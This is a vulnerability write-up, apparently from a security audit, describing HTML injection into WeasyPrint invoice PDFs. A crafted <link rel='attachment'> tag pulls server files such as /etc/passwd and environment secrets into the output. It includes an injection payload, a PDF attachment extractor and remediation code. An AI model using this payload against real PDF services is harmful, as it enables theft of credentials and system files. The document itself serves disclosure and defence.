Overview
A recent security audit revealed a critical vulnerability in the way WeasyPrint processes user-provided data when generating invoices in PDF format. The issue stems from insufficient input validation, which lets attackers inject malicious HTML tags that are rendered within the generated PDF. This flaw makes it possible to extract sensitive files from the application's infrastructure or to query remote resources from the server.
Vulnerability Breakdown
The application allows user input, such as names or surnames, to be embedded directly into PDFs via the WeasyPrint engine. However, the lack of proper sanitization permits attackers to inject HTML tags into the input. For instance:
• Tags like <b> or <h3> enable attackers to manipulate the formatting of PDF content.
• Tags like <link> allow the inclusion of external files as PDF attachments.
Such crafted inputs exploit WeasyPrint's default configuration, enabling unauthorized access to files on the server or external sources. This capability can be leveraged to extract sensitive system data and perform internal reconnaissance.
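To make the mechanism concrete, here is a minimal sketch of the vulnerable pattern, assuming the invoice HTML is assembled by plain string interpolation. The template, the build_invoice_html helper, and the field names are hypothetical and are not taken from the audited application. WeasyPrint documents <link rel="attachment"> as its way of attaching a file to the PDF, so a surname that carries such a tag reaches the renderer as markup rather than as text.

```python
# Hypothetical invoice template; the audited application's real template is not shown here.
INVOICE_TEMPLATE = (
    "<html><body><h1>Invoice</h1>"
    "<p>Customer: {name} {surname}</p>"
    "</body></html>"
)


def build_invoice_html(name: str, surname: str) -> str:
    """Vulnerable pattern: user input is interpolated without any escaping."""
    return INVOICE_TEMPLATE.format(name=name, surname=surname)


# Attacker-controlled surname that asks the renderer to attach a local file.
malicious_surname = '<link rel="attachment" href="file:///etc/passwd">'
html_doc = build_invoice_html("John", malicious_surname)

# The tag survives intact, so an HTML-to-PDF engine would parse it as an element.
print(malicious_surname in html_doc)
```

Nothing in this sketch touches WeasyPrint itself. The point is only that the injected tag is already part of the document by the time rendering starts.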
Real-World Exploitation
During testing, auditors demonstrated the severity of this vulnerability. The files they retrieved contained:
• Payment operator tokens
• Credentials for SMS and email gateways
• PostgreSQL database access credentials
• Hosting system access credentials
• JWT encryption keys
Additionally, the vulnerability allowed querying of internal infrastructure from the server processing the PDFs, highlighting its potential for lateral movement within the application environment.
Finding the Vulnerability
Now, let's move on to the interesting part! To identify this vulnerability and provide proof of its existence, I sent the following request:

The following response demonstrates the server's acceptance of the malicious payload and initiation of PDF generation:

Then I downloaded the PDF file generated by the malicious payload:

Below is the extracted Python script (e.g., ex.py) used during the analysis:
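The original ex.py is not reproduced in this text. As a stand-in, the following is a minimal sketch of how such an extractor could work, and it should not be read as the author's script. It assumes that attachments are stored as stream objects whose dictionary contains /EmbeddedFile and that they are either uncompressed or Flate-compressed. The function name and the synthetic test fragment are illustrative only.

```python
import re
import zlib

# Matches each indirect object: "<num> <gen> obj ... endobj".
OBJECT_RE = re.compile(rb"\d+\s+\d+\s+obj(.*?)endobj", re.DOTALL)
# Splits an object body into its dictionary and its raw stream bytes.
STREAM_RE = re.compile(rb"(<<.*?>>)\s*stream\r?\n(.*?)\r?\n?endstream", re.DOTALL)


def extract_embedded_files(pdf_bytes: bytes) -> list[bytes]:
    """Return the decoded payload of every /EmbeddedFile stream found."""
    payloads = []
    for obj in OBJECT_RE.finditer(pdf_bytes):
        match = STREAM_RE.search(obj.group(1))
        if match is None:
            continue  # Not a stream object.
        dictionary, raw = match.groups()
        if b"/EmbeddedFile" not in dictionary:
            continue  # A stream, but not an attachment.
        if b"/FlateDecode" in dictionary:
            # decompressobj tolerates a trimmed trailing byte, unlike zlib.decompress.
            raw = zlib.decompressobj().decompress(raw)
        payloads.append(raw)
    return payloads


# Synthetic single-object fragment standing in for a real generated PDF.
secret = b"DB_PASSWORD=example\n"
compressed = zlib.compress(secret)
fake_pdf = (
    b"%PDF-1.7\n1 0 obj\n<< /Type /EmbeddedFile /Filter /FlateDecode /Length "
    + str(len(compressed)).encode()
    + b" >>\nstream\n" + compressed + b"\nendstream\nendobj\n"
)
print(extract_embedded_files(fake_pdf))
```

For a real file, the bytes would come from open(path, "rb").read() and each payload would be written to disk. A regex scan like this ignores encryption and other filters, so a maintained PDF library is the more robust choice outside a quick proof of concept.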

Using the ex.py script, I extracted the attachment from the PDF document:

After running the script, the following file appears in the directory:

The contents of the extracted file are displayed, revealing very sensitive environment variables:

That is not all! I then downloaded a second PDF file, generated from another malicious payload:

As you can see, the contents of the extracted /etc/passwd file are displayed, confirming unauthorized file access:
Root Cause
This vulnerability stems from the default configuration of WeasyPrint, which allows unrestricted access to local and external files. Without stringent input validation and output sanitization, the software effectively serves as a bridge for unauthorized data extraction.
To address this vulnerability, organizations should:
1. Implement Input Validation and Sanitization
User-generated data should be rigorously sanitized to strip out any HTML or script tags before being incorporated into documents.
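One simple way to neutralize injected tags is to escape user input before it is placed into the HTML, so that it is rendered as literal text. The sketch below uses html.escape from the Python standard library. The template and the build_invoice_html_safe helper are hypothetical, and an application that uses a template engine would normally rely on that engine's auto-escaping instead.

```python
from html import escape

# Hypothetical invoice template; field names are illustrative only.
SAFE_INVOICE_TEMPLATE = (
    "<html><body><h1>Invoice</h1>"
    "<p>Customer: {name} {surname}</p>"
    "</body></html>"
)


def build_invoice_html_safe(name: str, surname: str) -> str:
    """Escape <, >, &, and quotes so user input cannot introduce markup."""
    return SAFE_INVOICE_TEMPLATE.format(
        name=escape(name),
        surname=escape(surname),
    )


payload = '<link rel="attachment" href="file:///etc/passwd">'
safe_html = build_invoice_html_safe("John", payload)

# The payload is now inert text: no <link> element exists in the document.
print("<link" in safe_html)
```

Escaping at the point of output is usually easier to get right than trying to strip tags with pattern matching, because it does not depend on recognizing every possible dangerous element.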
2. Restrict Resource Access
Limit the software's access to local and external files, allowing only resources essential for its operation.
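WeasyPrint lets the caller supply a custom url_fetcher when constructing an HTML object, which is a natural place to enforce such a restriction. The following is a sketch under stated assumptions: the allow-list values are hypothetical, and the name and signature of the default fetcher have varied between WeasyPrint releases, so the delegation line should be checked against the installed version.

```python
from urllib.parse import urlparse

# Hypothetical allow-list: only HTTPS assets from this host may be fetched.
ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"static.example.com"}


def is_allowed_url(url: str) -> bool:
    """Accept a URL only if both its scheme and its host are allow-listed."""
    parsed = urlparse(url)
    return parsed.scheme in ALLOWED_SCHEMES and parsed.hostname in ALLOWED_HOSTS


def restricted_url_fetcher(url: str):
    """Reject anything outside the allow-list, then defer to WeasyPrint."""
    if not is_allowed_url(url):
        raise ValueError(f"Blocked resource: {url!r}")
    # Imported lazily so the policy can be exercised without WeasyPrint installed.
    # Assumption: the installed release exposes weasyprint.default_url_fetcher.
    from weasyprint import default_url_fetcher
    return default_url_fetcher(url)


# Assumed wiring (not executed here):
#   HTML(string=html_doc, url_fetcher=restricted_url_fetcher).write_pdf("invoice.pdf")
print(is_allowed_url("file:///etc/passwd"))
```

With this policy, file:// URLs and requests to internal hosts are refused before any data is read. Note that it also blocks data: URIs and relative URLs resolved against a local base, so the allow-list needs to reflect what the invoice templates legitimately load.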
3. Environment Hardening
a) Segregate sensitive configuration files across different machines.
b) Adopt the principle of least privilege for processes involved in PDF generation.